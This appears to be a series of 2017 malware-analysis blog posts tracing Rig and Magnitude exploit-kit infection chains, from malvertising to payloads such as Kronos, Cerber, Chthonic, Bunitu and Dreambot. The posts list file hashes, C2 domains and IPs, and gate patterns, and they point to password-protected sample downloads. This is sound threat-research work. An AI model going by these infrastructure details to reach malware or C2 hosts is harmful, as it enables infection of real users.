Rig EK delivers Kronos Banker

Summary:

I took a break for a while though was still finding the usual Chthonic, Bunitu and Dreambot Rig EK flows from the usual HookAds, Rulan and Fobos campaigns. If you are interested in those let me know. I still have the PCAP’s.

Someone also messaged me about changing the way I capture packets. I have not done this yet but will look into it.

Anyway today I found Kronos via malvertising which led to a website that contained 3 iframes that redirected to Rig EK. In this flow I was using IE 11 and the latest version of Flash.

I would be interested to know any domains that Kronos targets to see if I can see any injections occuring.

Background Information:

  • A few articles on Rig exploit kit and it’s evolution:

https://www.uperesia.com/analyzing-rig-exploit-kit
http://malware.dontneedcoffee.com/2016/10/rig-evolves-neutrino-waves-goodbye.html
http://securityaffairs.co/wordpress/55354/cyber-crime/rig-exploit-kit-cerber.html

  • Article on Kronos

https://securityintelligence.com/the-father-of-zeus-kronos-malware-discovered/

Downloads

(in password protected zip)

Details of infection chain:

(click to enlarge!)

 

 

Full Details:

 

Found initially through malvertising, the dummy website has 3 iframes on it that redirect to Rig EK.

tripleFrame

The payload was Kronos Banker. The first EXE was dropped by Rig. It then created the second EXE and eventually injected itself into svchost:

SHA256: b024266f710c6c7a1517d4623e048b8c564dabf9ac294ba6317762fa6c830142
File name: vqb1zpvr.exe
Detection ratio: 19 / 65
SHA256: ffc1cfe4cfa36477ead629bd1a2c6ffb266502c3261b85de431137da411320a8
File name: domain.exe
Detection ratio: 8 / 62

I saw three domains associated with Kronos in total. POST requests were made to “/kronos/connect.php”:

kgkjvkjgvkgvkhg.xyz
khgkjhkjghkjgh.xyz
kljhlkjhkljh.xyz

kronosCnC

Viewing the functions of “domain.exe” shows what appears to be form grabbing and HTML injection.

functions

Magnitude EK drops Cerber (Scriplet changed to “.bmp”)

Summary:

Its been a fairly standard week for Rig EK. I’ve not spotted anything new or interesting so I decided not to blog about it this week. I did however discover a change in Magnitude EK. It’s a small one but the Scriplet now has the extension “.bmp” instead of “.ico”.

I also ran this flow with the latest IE 11 and Flash Player and still got Cerber Ransomware (still calling itself CRBR). If you’ve ever fiddled with security settings you’ll probably scream that scriplets are disabled by default which is true. I did play with the security settings to try to give see what payload the scriplet drops. Alas they still failed as usual and Cerber appeared from it’s normal vector.

Background Information:

  • Article from RSA, although a few months old and missing some newer aspects of Magnitude, the fundamentals have not changed.

https://community.rsa.com/community/products/netwitness/blog/2017/02/09/magnitude-exploit-kit-under-the-hood

  • A few previous Magnitude EK posts from me.

Multiple Magnitude EK drops Cerber Ransomware Samples

Magnitude EK drops “CBRB” (Cerber Ransomware)

Magnitude EK via malvertising delivers Cerber Ransomware

Downloads (in password protected zip)

Details of infection chain:

(click to enlarge!)

MagnitudeBMP

Full Details:

Just to note for this flow I ran IE 11 downloaded straight from the MS website and the latest Flash was installed. This was to demonstrate the need to patch your operating system as clearly these updates were not enough to stop Magnitude (albeit i did lower IE security settings)

FlashPlayerIEVersion

 

Most notable about this flow is the change of the naming of the scriplet used by Magnitude EK.

The scriplet is called in the landing page. I have deobfuscated most of it and you can see the call to the “.bmp” scriplet. Previous it has been “.ico”.

ScripletCall

This is the scriplet mostly deobfuscated with some variables renamed. Here you can see an executable is dropped and ran with cmd. These executables always fail and are 0 kb. I’m not sure why this is the case.

ScriptletDecode

If you enlarge this picture you will see  a condensed version of all the processes that were run on the endpoint.

MagProcesses

The payload is Cerber Ransomware. This version calls itself “CBRB”.

cerberpic

This version of a Cerber is at least a week old (UDP patterns are identical but sample is fresh from 3rd) however it still does a good job at evading a lot of AV vendors.

SHA256: 46e29c56d426a4c16548b74f77b2fdd75005ddac1333039567d16212cdc585e4
File name: a.exe
Detection ratio: 14 / 61

 

Magnitude EK drops “CBRB” (Cerber Ransomware)

Summary:

Whilst the Petya variant ransomware campaign is occurring the use of WMIC reminded me of Magnitude EK which also uses it to run the payload. It’s also able to run PowerShell commands.

I hope to do a few learning tutorials on Magnitude in the near future mainly focusing on deobfuscation as it is vastly more complex than Rig EK. My current stumbling block is that I’m not entirely sure what the function of the 2nd part of the landing page is. If you know give me a nudge (its the “further exploits” part). It is not included in any articles that I have found.

This version of Cerber calls itself “CBRB” which is odd.

 

Background Information:

  • Article from RSA, although a few months old and missing some newer aspects of Magnitude, the fundamentals have not changed.

https://community.rsa.com/community/products/netwitness/blog/2017/02/09/magnitude-exploit-kit-under-the-hood

  • A few previous Magnitude EK posts from me.

Multiple Magnitude EK drops Cerber Ransomware Samples

Magnitude EK via malvertising delivers Cerber Ransomware

Downloads (in password protected zip)

Details of infection chain:

(click to enlarge!)

MagnitudeEK28

Magnitude EK drops “CRBR” Ransomware

Full Details:

At some point I hope to take a deep dive into Magnitude EK, mostly focusing on deobfuscation. The first gate for example uses your “window.screen” object to generate the next URL and it’s quite interesting.

Although not shown in the main picture, a new trend for Magnitude is a double landing page which causes duplicate traffic.

DoubleLanding

For now here is a list of processes that were executed:

processes

You can see the Scriplet is ran which drops 3 payloads all of which fail. I’m not sure why they fail but it’s possible that as the Flash request is one of the very first requests in the actual landing page and that Magnitude has already decided how to drop the payload and thus these fail. I will try it one day without Flash.

A PowerShell command is ran to download a file called “b.exe” and finally WMIC is used to run the payload “a.exe“.

 

The payload is of course Cerber Ransomware. This version calls itself “CBRB”.

cerberpic

When i submitted to VT it has relatively few detection’s and none directly refer to it as Cerber though some vendors may call it other things.

SHA256: efe238b3d28c819b27abe668d1188d7534101bcf9a1cfef0c7d56e33b00b8424
File name: a.exe
Detection ratio: 13 / 61

 

 

Rig EK via JS Redirector leads to Pushdo dropping Cutwail.

Summary:

Today I found a probable compromised website that contained a harmless looking script by name at least. However it led to a website hosting a JavaScript redirector to Rig EK. The chain is interesting and I have not seen one like it yet since I started doing this.

The payload was Pushdo dropping Cutwail. Thanks to @Antelox for the identification. Although this is an old botnet/spammer it had been spotted by @DynamicAnalysis late last year (https://malwarebreakdown.com/2016/10/20/eitest-leads-to-rig-ek-at-185-45-193-52-which-drops-cutwailpushdo-botnet/).

The malware aggressively spammed POST requests and SMTP eating up my disk space rapidly. There is an interesting deep dive by Trend and Blueliv regarding this malware below.

Background Information:

  • A few articles on Rig exploit kit and it’s evolution:

https://www.uperesia.com/analyzing-rig-exploit-kit
http://malware.dontneedcoffee.com/2016/10/rig-evolves-neutrino-waves-goodbye.html
http://securityaffairs.co/wordpress/55354/cyber-crime/rig-exploit-kit-cerber.html

  • Article on Pushdo/Cutwail

https://www.trendmicro.de/cloud-content/us/pdfs/business/white-papers/wp_study-of-pushdo-cutwail-botnet.pdf

https://www.blueliv.com/research/tracking-the-footproints-of-pushdo-trojan/

 

Downloads

(in password protected zip)

Details of infection chain:

(click to enlarge!)

RigCutwail

Rig EK via a JavaScript redirector delivers Pushdo dropping Cutwail

Full Details:

I found this website through malvertising. It appears to be an old probably compromised or even fake website that contains a script that appears harmless at a glance.

adultsite

The script appears at the bottom of the page and appears to be named similar to a legitimate script called “js/wp-emoji-release.min.js?ver=4.4.10

Harmless

The script contains code which is likely profiling then redirects to another domain hosting a JavaScript file.

FakeSCript

This script contains a 301 redirect to a another script called “scr.php“. This contains what looks like two JavaScript redirectors leading to Rig EK.

FrameToRig

The payload was Pushdo dropping Cutwail. Pushdo is a downloader dropping  Cutwail which refers to the spamming module of the Pushdo botnet.

SHA256: 93b920e774874615c40b0b59149ea0200f2c23ece5e27ca1230ffa4d646c45b2
File name: g45g4yh.bin
Detection ratio: 11 / 60

Although my PCAP will have most of not all the traffic, VT also seemed to capture the POST requests in the Behaviour Section which is useful for IOC’s.

The malware created multiple svchost processes and a startup entry. The processes began to multiply as time went on. It does not do a great job at hiding itself and did not delete itself from temp.

startup

Pushdo

It then began violently spamming POST requests and SMTP.

SMTPspam

violentposts

Here is a sample POST request which appears to return a website.

POST

Four Rig EK Flows from Malvertising (Bunitu & Chthonic)

Summary:

Here I have four Rig EK flows from 13-16 June from malvertising chains. The payloads were Chthonic and Bunitu. I have not gone into much detail in this blog regarding the infection chains as I have already written about them in previous blogs. These however are all new referrers which may be worth noting.

There are 3 gates here to redirect to Rig:

  • A simple 302 redirect
  • Bunitu’s “Small Gate”
  • At least two domains with the same pattern “IndexZ Gate”

Background Information:

  • A few articles on Rig exploit kit and it’s evolution:

https://www.uperesia.com/analyzing-rig-exploit-kit
http://malware.dontneedcoffee.com/2016/10/rig-evolves-neutrino-waves-goodbye.html
http://securityaffairs.co/wordpress/55354/cyber-crime/rig-exploit-kit-cerber.html

  • Oldish article regarding Chthonic banking trojan:

https://securelist.com/blog/virus-watch/68176/chthonic-a-new-modification-of-zeus/

  • Article on Bunitu Trojan:

https://blog.malwarebytes.com/threat-analysis/2015/07/revisiting-the-bunitu-trojan/

Downloads

(in password protected zip: (infected))

Details of infection chain:

(click to enlarge!)

MultiRig


Four samples of Rig EK from malvertising

 

 

Full Details:

All flows were found through malvertising chains between 13-16 June 2017. Below are two previous blogs that cover Chthonic and Bunitu.

Due to time issues I was unable to capture all the activity from my lab. Instead with the assistance of @LedTech3 i was able to recover the payloads from the PCAP’s. I have ran them through Hybrid Analysis

advert-mal.bin (Chthonic)

302Malvert

302 to Rig EK

SHA256 – 159cda8598b1916bcdeba8c31b88183e576d49673da6635c26f36ff9c291de07

C2 – HTTP – POST – pationare.bit/ – 86.110.117.53                                                                                                  POST – pationare.bit/www/ – 86.110.117.53

https://www.hybrid-analysis.com/sample/159cda8598b1916bcdeba8c31b88183e576d49673da6635c26f36ff9c291de07?environmentId=100

 

jackportreroll-mal.bin (Bunitu)

small

Small Gate to Rig EK, page always contains the “small” tag and always drops Bunitu

SHA256 – 61982aa119f5297d23300d59a1f7bcc030348025d8a224ca50894652d815a42b

C2 – DNS – p.onlinecbbeer.com – 84.210.101.33
DNS – f.onlinecbbeer.com – 94.106.242.28

https://www.hybrid-analysis.com/sample/61982aa119f5297d23300d59a1f7bcc030348025d8a224ca50894652d815a42b?environmentId=100

 

shoppinwithus-mal.bin (Chthonic)

IndexZ-2

iframe to Rig EK will keep monitoring to see if it reoccurs enough to call it “IndexZ Gate”

SHA256 – afc31940380359380f27cd0cbcc18f9eb67027107d434d190a725f124b1b554e

C2 – HTTP – POST – letit2.bit/home/www/  – 47.91.124.165                                                                                     POST – letit2.bit/www/              – 47.91.124.165

https://www.hybrid-analysis.com/sample/afc31940380359380f27cd0cbcc18f9eb67027107d434d190a725f124b1b554e?environmentId=100

youcaught-mal.bin (Chthonic)

IndexZ

iframe to Rig EK will keep monitoring to see if it reoccurs enough to call it “IndexZ Gate”

SHA256 – 4a96c45844fa6719b91d525c97b9cad479c92eec44c16f969ce7f3a3aa1a99c1

C2 – HTTP – POST – letit2.bit/home/www/  – 47.91.124.165                                                                                     POST – letit2.bit/www/              – 47.91.124.165

https://www.hybrid-analysis.com/sample/4a96c45844fa6719b91d525c97b9cad479c92eec44c16f969ce7f3a3aa1a99c1?environmentId=100

 

Rig EK via malvertising drops Dreambot

Summary:

Recently I have found a lot of Rig EK as have many of the other researchers from malvertising. Today I revisited an old site called “likexhamster” which in last May was dropping Chthonic via a fake ad domain served by a popunder script.

This time the same mechanism dropped Dreambot aka as gozi. Additionally Rig EK appears to have been changing it’s URL patterns of late. I was collecting several samples to investigate but @nao_sec  has posted a series of tweets which reveals the extent of the changes.

Background Information:

  • A few articles on Rig exploit kit and it’s evolution:

https://www.uperesia.com/analyzing-rig-exploit-kit
http://malware.dontneedcoffee.com/2016/10/rig-evolves-neutrino-waves-goodbye.html
http://securityaffairs.co/wordpress/55354/cyber-crime/rig-exploit-kit-cerber.html

  • Article on Dreambot:

https://blog.malwarebytes.com/threat-analysis/2017/04/binary-options-malvertising-campaign-drops-isfb-banking-trojan/

Downloads

(in password protected zip: (infected))

Details of infection chain:

(click to enlarge!)

Dreambot

Rig EK via an ad on a porn website delivers Dreambot

Full Details:

The infection chain begins on a porn website called “likexhamster“. This site is filled with ads though one particular popunder script loads a fake ad “occurent.info” Below you can see the script and then what was returned after the “eval” function.

popunderreturn

The ad leads to what appears to be the Rig EK pre-landing page. If the environment passes the checks, a redirection to Rig EK occurs.adbanner

Note the Rig EK URL parameters:

rigurlparams

The payload was Dreambot – an information stealer/banking trojan AKA Gozi/ISFB.

SHA256: d193de89f70c1049999eabf12a3523b01c695bb536ece4de8ddc62ac71a12424
File name: d193de89f70c1049999eabf12a3523b01c695bb536ece4de8ddc62ac71a12424.bin
Detection ratio: 15 / 61

Dreambot connects to a CNC server using a URL that contains the string “images” and “.avi”.  though I have seen other variant of Ursnif use different strings such as “.jpeg” etc.

dreambottraffic

The below image shows some of  the actions Dreambot took during behavioural analysis.

dreambotactions2

Dreambot sends data over TOR. Below is a screenshot of some of the domains.

dreambot

 

 

 

Rig EK via Malvertising drops Zloader and Chthonic

Summary:

I have been following an IP over the past week which I originally found dropping an interesting coin miner. In attempt to find this miner again (as it appeared as if it was in dev) I began to look into it in more detail.

When a specific resource is targeted the browser is redirected to Rig EK or to a fake Flash file. All sites use the http.equiv attribute to refresh the screen loading Rig EK landing page URL. So far I have observed a coin miner, Chthonic and Zloader as payloads.

Unfortunately I had so many payloads and pcaps that I got lost within them and owing to a lack of time I have not been able to focus to prepare my usual style blog. None the less, this IP is a great source for Rig EK for those interested in studying it.

Background Information:

  • A few articles on Rig exploit kit and it’s evolution:

https://www.uperesia.com/analyzing-rig-exploit-kit
http://malware.dontneedcoffee.com/2016/10/rig-evolves-neutrino-waves-goodbye.html
http://securityaffairs.co/wordpress/55354/cyber-crime/rig-exploit-kit-cerber.html

Downloads

(in password protected zip: (infected))

Details of infection chain:

(click to enlarge!)

DCDcY96XcAEyez2

Rig EK displays “Shadow Fall”, drops Chthonic.

Full Details:

Lately I have been following an IP that is serving Rig EK via a http.equiv “REFRESH” attribute. This causes the page to refresh and “redirect” the browser to Rig EK.

ChtonicPic

The IP (ASN 24940 (Hetzner Online AG) has several domains registered to it with a general theme of “XXXredirect.ru”

VTPic

https://www.virustotal.com/en/ip-address/144.76.174.172/information/

Originally I found a domain hosted on this IP through RoughTed -> Rig EK via RoughTed drops a Miner

I have also found it through an “Onclkds” variant which is shown in the picture.

You can also just browse directly to one of these domains however you need to add a resource. So far I have seen three of these:

XXXredirct.ru/lan – Rig EK -> Chthonic

Chtonic1

https://www.hybrid-analysis.com/sample/8b2fe525ddcb3d56154a3583e8e14467046e31358a89ef56b1e9e39672f779c9?environmentId=100

XXXredirct.ru/1 – Rig EK -> Zloader

Zloader1

https://www.hybrid-analysis.com/sample/e1977df942e969abf6ae7c7d408766d4e8d6fb50f785ea5af384bbb068bfb86a?environmentId=100

XXXredirct.ru/xfile – Fake Flash -> Chthonic

Chth2

https://www.hybrid-analysis.com/sample/66cc94449e7d45bafd9fb72668d3112bb3a156573f374139dc36dd0f8b8ffa22?environmentId=100

There is a bit more information on the Flash file from the Twitter:

I also made a few tweets (and referenced in some) throughout the week in case you missed them:

And a bonus post of Bunitu and Magnitude:

Rig EK via Fake EVE Online website drops Bunitu.

Summary:

Through RoughTed I found my old Bunitu chain. This time instead of poker or adult themes, the threat actors are using EVE Online which is a very popular space themed MMORPG.

The fake website contained the same redirection mechanisms as previous Bunitu posts. That is it redirects to a domain hosted on the same IP and then there is an iframe to Rig EK containing the “small” tag. I did not test the fake EVE website to determine if any phishing was involved.

Oddly I found strings for Space Invader within Bunitu. It will be interesting if anyone can find out why that is so.

 

Background Information:

  • A few articles on Rig exploit kit and it’s evolution:

https://www.uperesia.com/analyzing-rig-exploit-kit
http://malware.dontneedcoffee.com/2016/10/rig-evolves-neutrino-waves-goodbye.html
http://securityaffairs.co/wordpress/55354/cyber-crime/rig-exploit-kit-cerber.html

  • Article on Bunitu Trojan:

https://blog.malwarebytes.com/threat-analysis/2015/07/revisiting-the-bunitu-trojan/

  • Article on Rough Ted:

https://blog.malwarebytes.com/cybercrime/2017/05/roughted-the-anti-ad-blocker-malvertiser/

Downloads

(in password protected zip)

Details of infection chain:

(click to enlarge!)

hehre

Rig EK via a fake EVE Online site drops Bunitu proxy trojan.

Full Details:

RoughTed is a malvertising operation known for it’s wide scope. See the MalwareBytes article above for a more in depth dive.

roughted.PNG

This led to a fake EVE Online website which appears to mirror the official EVE Online. Below is what the fake website looks like.

EVEPhish

The website contains an iframe to a domain hosted on the same IP address

frametomal

This domain contains an iframe leading to Rig EK. As with previous Bunitu posts, this gate always contains the “small” tag.

smallgate.PNG

Rig EK then dropped Bunitu proxy trojan. Bunitu opens random ports by changing firewall settings and allows the host to become a remote proxy. Every time a client connects, Bunitu issues a DNS request. Although these did not trigger any ET signatures I am sure they are initiated by Bunitu.

Usually I would link a Virus Total link or a Hash but I will update that later.

The below shows strings associated with firewall changes and the DLL that is dropped.

morestrings

Interesting i found strings for Space Invaders. I’m not sure why these are present!

spacestrings

Rig EK Via RoughTed Delivers Chthonic

Summary:

Using the malware operation RoughTed again I came across a flow highly similar to the one I found yesterday that dropped a miner. The compromised website used the http.equiv attribute to refresh the page revealing Rig EK.

The payload was ZeuS variant known as Chthonic. Aside from using tools to statically analyse the binary I did submit it to Hybrid Analysis as there were some anomalies when it ran on my host.

 

Background Information:

  • A few articles on Rig exploit kit and it’s evolution:

https://www.uperesia.com/analyzing-rig-exploit-kit
http://malware.dontneedcoffee.com/2016/10/rig-evolves-neutrino-waves-goodbye.html
http://securityaffairs.co/wordpress/55354/cyber-crime/rig-exploit-kit-cerber.html

  • Oldish article regarding Chthonic banking trojan:

https://securelist.com/blog/virus-watch/68176/chthonic-a-new-modification-of-zeus/

  • Article on Rough Ted:

https://blog.malwarebytes.com/cybercrime/2017/05/roughted-the-anti-ad-blocker-malvertiser/

Downloads

(in password protected zip: (infected))

Details of infection chain:

(click to enlarge!)

gergeggr

Rig EK via RoughTed malvertising delivers ZeuS Chthonic 

Full Details:

RoughTed is a malvertising operation known for it’s wide scope. See the MalwareBytes article above for a more in depth dive.

roughted

RoughTed led to a compromised website that used the “http.equiv” attribute to refresh the screen which presents the Rig EK landing page.

httpequiv

Rig EK crashed my browser forcing me to restart. By the time I had recognised I was on the landing page (3 secs in) the payload had already cleaned itself up so i refreshed the page causing a 2nd flow.

rigflow

According to the 2014 article by securelist, Chthonic has the following capabilities: Capabilities

I was able to peer at the strings and came across what looks like security questions or checks:

strings

The binary has a relatively low detection rate. It was 12+ hours since I found it and currently it has 9 detections on VT.

SHA256: 636fd02a030b99c2af3245052f9ff0c6d80b27e6f159a98ff1a1dba83634db9a
File name: lwlri630.exe
Detection ratio: 9 / 60

Chthonic performed POST requests to “patrionare.bit“. I believe this to be the malware downloading modules. The binary did not prompt for a restart (I had UAC turned off) or even force a restart. After restarting The CnC traffic was observed but it had not injected itself into another process and neither did it create an executable as observed in the HA report.

zeuscnc